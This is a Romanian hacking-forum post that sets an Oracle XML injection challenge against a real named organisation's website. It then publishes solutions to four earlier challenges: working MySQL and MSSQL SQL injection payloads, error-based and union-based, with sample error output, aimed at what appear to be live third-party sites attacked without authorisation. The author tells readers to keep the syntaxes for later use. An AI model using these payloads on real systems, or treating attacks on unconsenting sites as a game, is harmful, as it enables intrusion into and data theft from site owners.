Jump to content
Sheyken

[Hard]Oracle XML Injection + Bonus rezolvari [ End 1 # ]

Recommended Posts

Posted (edited)

Dragii mei "Challengeisti" prin postarea acestui challenge, ma voi retrage pentru un anumit timp din aceasta categorie.

De ce ? [ Pentru ca nu mai am site-uri vulnerabile. :)) ]

O sa mai caut si voi reveni sa facem alte challenge-uri.

-----------------------------------------------------------

[+]Target: Fundación Antena 3

[+]Document: Oracle XML Injection

[+]Image: xmly.png

Cerinte:

---------------------------

Sintaxa se trimite prin PM

Postarea unui ScreenShoot este obligatorie

Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date.

---------------------------

Solvers:

DarkyAngel [ # 1 ]

totti93 [ # 2 ]

Wubi [ # 3 ]

caramea [ # 4 ]


____
| __ ) ___ _ __ _ _ ___
| _ \ / _ \| '_ \| | | / __|
| |_) | (_) | | | | |_| \__ \
|____/ \___/|_| |_|\__,_|___/


M-am gandit ca, odata cu terminarea primei "sesiuni" de challenge-uri sa postez rezolvarile de la challenge-urile trecute.

Challenge 1

https://rstcenter.com/forum/56878-medium-hard-mysql-injection-challenge.rst

Sintaxa: News | Puerto Rico Islanders or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- [ MySQL Injection Error Based ].

-----------------------------------------------------------------------

Challenge 2

https://rstcenter.com/forum/57020-easy-medium-mysql-injection-challenge.rst

Sintaxa se putea face de 2 feluri.

Error based & Union based.

Error based -> SIGMA or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 --

Union Based -> SIGMA and 1=2 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13 /*

---------------------------------------------------

Challenge 3

https://rstcenter.com/forum/57037-medium-hard-sql-injection-challenge.rst

Aici mai mult e funny si putina logica. Doar 3 au reusit sa rezolve acest challenge. Explicatia:

Arabi atunci cand adaugati apostroful langa ?id=2 va apare urmatoarea erroare -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1

SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2\')

Numarul de coloane il veti afla prin urmatorul query -> Arabi and (select * from spsinglepage)=(select 1)

 [B][COLOR="#00FF00"]Operand should contain 8 column(s)[/COLOR][/B]
SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2 and (select * from spsinglepage)=(select 1))

Si asa, injectia se face in felul urmator -> Arabi) union (select 1,2,3,4,5,6,7,8

-----------------------------------------------------

Challenge 4

https://rstcenter.com/forum/57056-easy-medium-mssql-injection-challenge.rst

Sintaxa: Bradford Chamber | News or 1=convert(int,(@@version))--

Sintaxa facut de totti93 [ union based ] --> Bradford Chamber | News

-----------------------------------------------------

Pe final as dori ca voi, sa va notati aceste sintaxe, undeva in pc pentru ca azi ati invatat ceva nou [majoritatea] de aceste sintaxe veti avea nevoie in viitor [ poate va intalniti cu o problema, iar una din sintaxele de mai sus este cheia rezolvari ].

Am sa incerc sa revin cu noi provocari.

Va multumesc pentru rabdarea pe care ati avut-o.

Edited by Sheyken
  • Upvote 2
Posted

Foarte frumos din partea ta,rar vezi pe cineva care sa posteze solutiile la sfarsitul unu challenger ceea ce esti si normal,pentru a putea "invata,pricepe" si altii.

Totusi ar fi o mica observati,frumos era daca postai user:si sintaxa trimisa la fiecare in parte.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...